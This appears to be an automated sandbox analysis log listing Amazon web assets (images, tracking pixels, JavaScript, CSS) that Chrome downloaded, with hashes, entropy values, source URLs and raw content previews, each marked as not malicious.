                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!1."Aa2Q.q..#%3brt.......s....BT.......................................................1!.."aq..Q..23AR.............?...R.%.)J.JR.R....(.)X.^l$G...\.."i.E.7....C......Pr..s.D.+\G. .$.\{oy.?...u..,....T,1.Snv..#<.Ac..A..Kw>h.u.2...C.F.......=C..H...i..)JP.JR.R....(.)J.JR.R..9..\....~'....Fn..un.W.~...P..Y-.U..J...m<...:jW........J.....Rv.69.?.......),q=.....~......:l.JFp2.`{...*...Kna.A...__..(U.Hoa...0%@p.1.~k......A........Ve..t.._..([vQ.JR..R......+.c#wo_S.\....)Z...s....[k{.ayd1.-...bQ:.>U..u..;_.F.?.*7..j.Z....14x.k.ob. ...5.o.._.^?.u=].5..'..#$a6............c.JU.2......$.H1...I;.........xr..r.#.:.......a.W:.3.+.m.-,R@...pU..qT....}M....k.pyK.F...3/.$.`G...!.[....dx......)...z6....~.Z][...eS.c....U".......,.\'.......7C.0@$z.Vu`.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1500x80, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):9083
                                                                                                                                                                                                                                                                      Entropy (8bit):7.7750492274514516
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:1mNhXUdnAAylDDLY7llyyyyyyyyyyyyyyyyyyyyybS0eKX96OcjKeFrrjPQXv:1+wgDLgDyyyyyyyyyyyyyyyyyyyyyXhl
                                                                                                                                                                                                                                                                      MD5:248E52DE407C28D0602B6E60B748D765
                                                                                                                                                                                                                                                                      SHA1:18DAE3282693BD13864A45766E1D76761E25E4CF
                                                                                                                                                                                                                                                                      SHA-256:CC32870F0A925F22F83419AAFFB4E8FDDE6A0EFCB92C0B0B74278FDCA3C18C0C
                                                                                                                                                                                                                                                                      SHA-512:09BEB264880CB248FE4DF5112CA11B66003974B2A800E1C4C5F6B46794F2AFB1846D73BD2D774FF517E88570588D2F4C0D4E3DD5E32EA7F1B870919DF0DFC038
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Desktop-Outdoors-header-1500x80.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#........P...."................................................@........................~.......................;...........". .T@..4............................=;..[.......D_.....'......D7...........Q....$........."v7.(..t........;............BS2...P...w..Dg.._u...5.d...i~.Bm...Ux.....ju.DT5...u.L.J...^*Z./.._.....................zv.U...fkV...w....u.+...i.Z+TX....!&..:5f../.....I....2..u.........z...........;..........DS...w?.U.g.C'..{...oM.@N@h.,..u..1..=r_.u..Y>...4....g...p...G....O.e........~?........Y.h`........................................;.........................w.....................................................F.sJ.\.vv.1S.3p.......u.....KL.}+.MT..x.............#...cs*d........................................................p...........# ......;}..84..H..W?]....ug].H...F@...._..J.Qf.|..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (36389), with no line terminators
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):36390
                                                                                                                                                                                                                                                                      Entropy (8bit):5.337131075186544
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:2wbInw/BNHqbqilifGNfBBETgxCpQE0TXQaIith9qDO1nsnQVw1lGPCyVG5+opqv:55kbH6sDQablGQqgQ5q+iwI8VTB7WN
                                                                                                                                                                                                                                                                      MD5:0F728C1F84131990966B870B499E472A
                                                                                                                                                                                                                                                                      SHA1:9AE54840085067B8EFAE8843733EB594D4F28B0E
                                                                                                                                                                                                                                                                      SHA-256:B07B169C63F5A286E4A9F0368CEF3C86BC43987CDE3AE4D848B8548E7E15F605
                                                                                                                                                                                                                                                                      SHA-512:76A22A9471D7F57219F11676C750505019AC561C7E288424C66094AF12AA854E20024D6EA07E686F798EAEC52A142D5FED921B9634133B1D5D21AACF1C5454FE
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://d1lxz4vuik53pc.cloudfront.net/ii/1722546138571/inner-iframe.min.js
                                                                                                                                                                                                                                                                      Preview:"use strict";var _typeof="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t};!function(n){var r={};function o(t){if(r[t])return r[t].exports;var e=r[t]={i:t,l:!1,exports:{}};return n[t].call(e.exports,e,e.exports,o),e.l=!0,e.exports}o.m=n,o.c=r,o.d=function(t,e,n){o.o(t,e)||Object.defineProperty(t,e,{configurable:!1,enumerable:!0,get:n})},o.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return o.d(e,"a",e),e},o.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},o.p="",o(o.s=60)}([function(t,e){t.exports="undefined"!=typeof window&&window.Math==Math?window:"undefined"!=typeof self&&self.Math==Math?self:Function("return this")()},function(t,e,n){var r=n(28)("wks"),o=n(43),i=n(0).Symbol,c=n(98);t.exports=function(t){return r[t]||(r[t]=c&&i[t]||(c?i:o)("Symbol."+t))}},function(t,e,n){e.a=f
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (26050)
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):211782
                                                                                                                                                                                                                                                                      Entropy (8bit):4.994172446365422
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3072:gnH2o3pouSXmkglKEKajAQlkEXZKt4ReJRYMsj3rzud:gnHcYMsjvud
                                                                                                                                                                                                                                                                      MD5:E4A8ABC219804CC2EB2E7CC13DE87DCF
                                                                                                                                                                                                                                                                      SHA1:8C3F139587C2801512665FEF41DA6D2A38DBA8BB
                                                                                                                                                                                                                                                                      SHA-256:4D1C6C4BCC378956DCED3A7F15CB34D3E0DA99C0E7DF60CB6DC0A0E787C1F138
                                                                                                                                                                                                                                                                      SHA-512:559C0A8AD63791F18B864BF9815EEE737D514E6B55DC1F910C3DF0422821350F1B37A232DBF81A3344CE4C40E1C51A358419231B79FB6B131756AC7E70DD806A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,31ASPyl+r4L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11yW2wLgbZL.css,01QhqFH8I8L.css,21ZD1QLZ9FL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,01LzHhtXxxL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&Z0Le314P"
                                                                                                                                                                                                                                                                      Preview:button,input,select,textarea{font-family:inherit}h1,h2,h3,h4,h5,h6{padding:0;margin:0}h1,h2,h3,h4{padding-bottom:4px}h1,h2,h3,h4{text-rendering:optimizeLegibility}h1:last-child,h2:last-child,h3:last-child,h4:last-child{padding-bottom:0}h1.a-spacing-none,h2.a-spacing-none,h3.a-spacing-none,h4.a-spacing-none{padding-bottom:0}h1 .a-size-base,h1 .a-size-mini,h1 .a-size-small,h1.a-size-base,h1.a-size-mini,h1.a-size-small,h2 .a-size-base,h2 .a-size-mini,h2 .a-size-small,h2.a-size-base,h2.a-size-mini,h2.a-size-small,h3 .a-size-base,h3 .a-size-mini,h3 .a-size-small,h3.a-size-base,h3.a-size-mini,h3.a-size-small,h4 .a-size-base,h4 .a-size-mini,h4 .a-size-small,h4.a-size-base,h4.a-size-mini,h4.a-size-small{padding-bottom:0}h1,h2{padding-bottom:4px}h3,h4{padding-bottom:4px}.a-size-medium .a-row.a-size-base,h1 .a-row.a-size-base,h2 .a-row.a-size-base,h3 .a-row.a-size-base,h4 .a-size-large .a-row.a-size-base{padding-top:1px}.a-size-base .a-row.a-size-base{padding-top:0}.a-size-micro{font-size:10px;l
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:"https://aax-eu.amazon.ae/x/px/RMT0BrY4-CsqXp65iFlSzhkAAAGRdjLjogMAAAIGAQBvbm9fdHhuX2JpZDIgICBvbm9fdHhuX2ltcDEgICAP5LDe/atf/%7B%22atf%22:false,%22ts%22:1724264943224%7D"
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x286, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):18924
                                                                                                                                                                                                                                                                      Entropy (8bit):7.958469858536003
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:rofzytVJPdXByZnpNeLzOWJbWVso8Mdzbf1crNQUDdpV+7A:kLyxGZnszOobWVsoJ1WBQUBpV+E
                                                                                                                                                                                                                                                                      MD5:17AFCC07F432A965E4073230B84158FC
                                                                                                                                                                                                                                                                      SHA1:C103CA76BB83EE33D9A40058E5B25DEA8351060B
                                                                                                                                                                                                                                                                      SHA-256:05A4E8F008737878C409EB189337A3180AF14B537DBFC723F9DE43A81CF6397F
                                                                                                                                                                                                                                                                      SHA-512:C73A2D763209DEE085AA4B9222A0D984C68256FB8A67882183EFE840AB9D9CED1F7D6A661D7C08A05E0BD99CF50FD493D4738A29328B6EF96CD2695EED7C554A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........5..........................................................................f..,.4G...&.R.3..]i.^...VUE.j.;......k6]Xa....?.............85..o..Jg....g....,T.,3k.a.....^k.%.yS...m..#O..-z.#yU.]..m..Mww#.*H......\.).>u].N-........x..Q........,..."...nn..E.I...Q&.u.K.m...f.W.w...k.kW.....:v...WZ.kt........#..@er!..u.........y.4v.$...Q%.....Z..B.j...C.7".Q..T.....K3.|..we0.?6.......t....o.@.P..%Lov.Xwljx.....l...c..k.'.N.a...DS........vk.l.^f.y`...zT......f.%.f.a.m.c.(f.d.)..sv..../gT.b.9...M..=?L.t.T.N.....A.l.U.....=..W6[..)t..vU.....$X.....-........+[+I..}K..s.+.U?...#."....,.~.....D.w=n..}.b..."=.."..."[%Y.u..k.zc.........d....88..z..L..t.^U......I...'....t^\...."d.@......@.5...!q....b..4.b5;...q.o.N..R.,.b8z.y..\[..+6.Im.+[..o.R.e..V3Vz..9.aj.......].o...=*E..(..o......W\D..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 283x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):24853
                                                                                                                                                                                                                                                                      Entropy (8bit):7.97698963780309
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:k25GkBcMcCqsQpHuGd2W8LWssW0+Js9oLNs05hNN52oXHivd03y+pMgwvSsJaPi:xgMlItuBWsswJsaFNNXASC+lsJaa
                                                                                                                                                                                                                                                                      MD5:187E83A33B0B7E6DAB7331674A957F5A
                                                                                                                                                                                                                                                                      SHA1:675F76266E051722CC8810F54F6B0DDBA44AA89D
                                                                                                                                                                                                                                                                      SHA-256:007B2D5A7D30500B0C1DA3CF1C07B3E85233D3370B90E1DADE452BA8249CC38B
                                                                                                                                                                                                                                                                      SHA-512:B3E864B7ADEBBCE702045C0821818D279C753CC9A3AAF76A06DA51FC9BEB65FC9A8D674A625A37A7D0C6CEDB926B32AA83754EA90557EAA0E381E0403DDE97EB
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."..........6...................................................................erau9w(.\..wqF..o.C.T...&.o.CS.o.(.;...$*...{...F...[k..Z.uU=.lS+ ...X<.l.=y.U......ur......Yc......`.."...:@...3U..l.*.#..-.~z=dk.)L.7a....4.._.}.....=|=.=<....X.z.J..z..%.R_.;.=.....Y.%..]....y.\..*.k.....P~...[......./zya`W.$F...#V...K.K.K........h.....}....Uz.K]...I.....^kC.T....T.V.5..|..s.......j\Os...........'..r..9.~....S.K..Bs.De8.AS..8....e.U..l%6F>.b.:'...is=j.h...v..+7\N@..QD...x..i...H...U45-.zc.]..}K=h..*..cC....y]...}....7..|.d$.4.#...^x.8..E.....2lJ...hZn...@%O.=k.^.~_..C..8p.T.>.57.0.m.*...^......./!Q.aw....g...cs.u...G....$.n...>.{...L...sh(.J.t.....L[....!.=.9.|.U}5...w9.a..;.....@+..D..._n.d...+S...d[/3f..$m.>.5..{.G&.N.-...@..4....I.ar..<."...t@.J..Z#rr.'3...'..]yE<.|......qF.d.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (6950)
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):265764
                                                                                                                                                                                                                                                                      Entropy (8bit):5.399539428872105
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:6144:Hwqd+moT/R99rjvyb3R4agBnJAQpwu6tqHlrIjXgeT6LkXtTlNJ86kziU1Bh+qoe:Hwqd+moTNrjvyb3R4agBnJAQpwu6tqH5
                                                                                                                                                                                                                                                                      MD5:80013F4D46B39587E446A634F5EBCCF4
                                                                                                                                                                                                                                                                      SHA1:768AAEF09F810DFE75C101A76A7828EA7B5CF15E
                                                                                                                                                                                                                                                                      SHA-256:7CA39CE45204BFDC7841D7B24F5A395C41CA5F4E5871A18E933C4D128C09965B
                                                                                                                                                                                                                                                                      SHA-512:2433F95A32A41BD06830A906BAC2FD6E4832044C3D6DDDD82C013CB0A8EB4EF6B3223BD1BDEC3895F72C041D7AEFC2754EC2A60C8BCB3C153F73FAE73A2BBAEA
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:////////////////////////////////////////////.;(function (packageFunction) {. /* istanbul ignore next */. var p = window.AmazonUIPageJS || window.P;. /* istanbul ignore next */. var attribute = p._namespace || p.attributeErrors;. /* istanbul ignore next */. var namespacedP = attribute ? attribute("FWCIMAssets", "") : p;.. /* istanbul ignore next */. if (namespacedP.guardFatal) {. namespacedP.guardFatal(packageFunction)(namespacedP, window);. } else {. namespacedP.execute(function () {. packageFunction(namespacedP, window);. });. }.}(function(P, window, undefined){.// BEGIN ASSET FWCIMAssets - 4.0./////////////////////////.// BEGIN FILE src/js/fwcim.js./////////////////////////./*...Full source (including license, if applicable) included below..*/./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, progressive, precision 8, 1500x600, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):58623
                                                                                                                                                                                                                                                                      Entropy (8bit):7.875674719603265
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:1536:4nld8BxE38orvWzvy8GzMZ0XzKoUgpeObmSzraJypu:4zDnrvAvy8GzI0XD/plzWJ6u
                                                                                                                                                                                                                                                                      MD5:8ABD97978296C8EEE78E3744E858E309
                                                                                                                                                                                                                                                                      SHA1:E9F3986067AFD3149BA8ADF97DFFA6E3F739943E
                                                                                                                                                                                                                                                                      SHA-256:40851D0EB9E79CC5F717AFD85A828D581AA039E6D4D537A1F0E65AD3EE39932A
                                                                                                                                                                                                                                                                      SHA-512:189FEA09812555CD30855F3A76B8FA5A8D9DDA085D9ACF56867F90038304EEE5163CD82345EA32D6EA6CA381A7B3F85BA0ACF8C15975A3EF318E63F3525AD421
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 440x500, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):36964
                                                                                                                                                                                                                                                                      Entropy (8bit):7.970154291292282
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:1uBolyGXMB4P9WmWYqj65o2hy4BO1zyP3NTvl+gpDBsVDWHSekuS+4b+FptI:IGXMaPtWm1hytsNlcVDWYuYb+6
                                                                                                                                                                                                                                                                      MD5:6CC9A05D8B5389D04CD34A2AC176AF83
                                                                                                                                                                                                                                                                      SHA1:4DFEB8603740E198E7B05D0AA7E26B78655790EF
                                                                                                                                                                                                                                                                      SHA-256:6E320130C3EBF434CCD9BCFB6AFD2133F5B2137B447173B70698832EE11C16C1
                                                                                                                                                                                                                                                                      SHA-512:8DEDF097D7565C8EB8690F1131AC3B09570148ED94DBF270F14C064F4756579B7569F3F78FE1B2AF61BF8301660FAF20FC7F452CE5A0D999671F52A0190607E5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/sports-outdoors/revamp2022/EN-L2-Outdoors-Inflatables-440x500.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF........................................................... ....+!.$...2"3*7%"0....................".........................."..............#............."................................................:n...5:7(..@...sr...Y........&\....<.o.V;}.5$...@.*.W2.Z.].v.jX.*.....Ms......m.....+..4.....ZXP....r..T.........:<...U..[...t..[.lbH.:89Ytb.]N..u......o.Yn..O....t..15n.ZV.-h.e..+.H...........f.g.....S..G.Z..E.6.(....n....6.]jA.9.v.k.s..O"+.<.<...Y..?:.../.fy..S....J..L..g.3....oAp....s...t..]'..M.ZL.....]..}.........$.#.(.{...{..ar}.=SS....V......^7H..~)...d.#...P.@.I.]F.....F.Y5\....RA.s...%.:.M.`6{.O...9.........I..r\9...uUs{o3W$.|.....~.:.....G...jl..[.v.W.......W.~.s.yJ....g].WF.I$u..[.s....MzU[V.....n.~.OQ.S..#.;........FI3.b.....y..g..R.&]|.].....t<u......+RZ.F..d.>W.Y#t.0.....z....ju...K+.Pd.K>.5..?.pns.X...r.RL.b...J...[..Ag.c..0.EOO.z..+...1W.#.9....5y..SG...6.xe.z.....p....=v\J.T.,........t1A"....].k.....5j..~.+.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 194x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):17386
                                                                                                                                                                                                                                                                      Entropy (8bit):7.971713661182734
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:JUcmXhN6RZjXoTPqp55WLsiezBAL7qxANuVjAKh+Yd:EcJUPq/5Li13wd
                                                                                                                                                                                                                                                                      MD5:EB75FB05C12CD16CF99139F3C55A3FFF
                                                                                                                                                                                                                                                                      SHA1:631713C03B4CB099AD5DE773EB71C2D479D05365
                                                                                                                                                                                                                                                                      SHA-256:29584E56D34D57493839A07B2067668192037DF524FC7E4443752754D26622BA
                                                                                                                                                                                                                                                                      SHA-512:94A949D056A156AA27087B4DD6201ECE0AE51157232D417A4FAEFF14FCC413CE2FA04811F8469549A81B044E52DB427FFAACACAB858F781C31A06831508D56F6
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1"A..Q2Raq..#B..$3CS..DUb....%...4Tru......................................................!1..."Aaq..2Q.....#b....B....C.............?..n..a.B`.E.....0D@n;..G.......0.f.z........1~0J.y.}i....%$.#.5ZF.;...`0.....u.oG..L..x.kz.W..e......O...[..!...W.N.....}....De....s...X.}GIB......>../u...J......U...Bwx.3X.=)........p.@n$w..h..?..2..B/...9-....DQ)7.. D..fU...C.=.......R....R......a.m.#n.....se..Sc...u.m...."..F!. .\..<.......S<.......)...X..x.7..>..R..|........c...5.K.... D.I.y.~...3o....<s...h&C.^.}X.].<d2.qC.......W...|.bM.{pG.....Q7y...U7O...^.&..~.D.q*.......#R.e.q.N.....G^..M.+..........O...s.m...Z...X.\..Ct.r...97.[T"...S..=...~.w..d.N..FP.....u...V...[..p_....}.Hu"n...jZ.N.ar..Y.9.(...<. .o.X........h.V.W.(.,.......w*@..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x320, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):30747
                                                                                                                                                                                                                                                                      Entropy (8bit):7.968248864222918
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:nBMi3mFzcW+z95T1PWQ8EN3GD4PTsMLKEFzUw7q:nii0cWCLWnEYktLKEFhq
                                                                                                                                                                                                                                                                      MD5:779C00F6DE13065181B5A42942031379
                                                                                                                                                                                                                                                                      SHA1:BEB377AB504D6BE082C98505C83A32971B936311
                                                                                                                                                                                                                                                                      SHA-256:181CC02786D7F7514F72A5244C48A86B6DB526FFAC2B13C41D1D5620F281A55D
                                                                                                                                                                                                                                                                      SHA-512:EF0C1E56B3500032C1424E7DF865F0B98A5C009BB4A3D3BD353536C474B0BF661A47B4A3E5DA1FAD9944175533AF15FDC50DB0E21F8C0774B9912B71F3270501
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.@.."..........5..................................................................z.E._.....`n.K.Z....Nq$..I$.I%[..,.Vz...U4.=\..b...9....:.I$.I$.I$.}.\...;..'....1.l.gU...P.@.".sK>..v....RX...fy..8..n.B....mf...j........>c....Q%...:..9Z?..\..Af.."....E|-&..Y.....^......Y}.PF-:......8;..v.C...9.{t.m_..3.3x|..-.cR......p.^.f.C...........!..)..K..m.F...!._@...../..!...;=5..SA.|4...(....u.V.C..dQ....^-....=..k..Qj.!.U..I..q\..cX..\.....c......f.v..."....=..Y..H....W9j\3x...#...))'s...........d.\...d..'...\p..35."..P...^c.43..%..x.%.9}..Xe.....j.h....6.r.ro@f..-I..{,".K.5..,.ZN$.I$..%5e.t.Q+..d.......y`.l..jz.3.{.w.!k.V.Mq. ..'...z.C..e..<4.Qt..O..yn..*...,I....l.`..g..$.$...t.._.........H..w..w)...*...E...G.@..="....%.n.J.x....%..5T...j.H.~..Q..2...q........|.|e.{......]......o8.}...[C.4
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 210x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4849
                                                                                                                                                                                                                                                                      Entropy (8bit):7.89645817157679
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TbABxNhXU5e4L9iVOSu06t5R2SI38OuG3VhlizrbjD9x+OhYn:/ADMe4AOwhmXvLhY
                                                                                                                                                                                                                                                                      MD5:7BFA58FE034D5BF30E21C42578300BB0
                                                                                                                                                                                                                                                                      SHA1:A87B223B4BDB5C40C0B8E9AE0A540B197E69BEF5
                                                                                                                                                                                                                                                                      SHA-256:1C137F202B660C8E6BFEE0C46528F6B7127F93784357672374BF7B6CC1DF484D
                                                                                                                                                                                                                                                                      SHA-512:A8170F57E0495AA0BE62B408BC32FD9EAA4678D8FC000CD3759CBAE823E6EC9DC39A6F30F1BD3DC1878775E4F129AF1DC7191C7A09911C6FEEA73F2932B133F8
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/51mS5FhRwRL._AC_SY200_.jpg
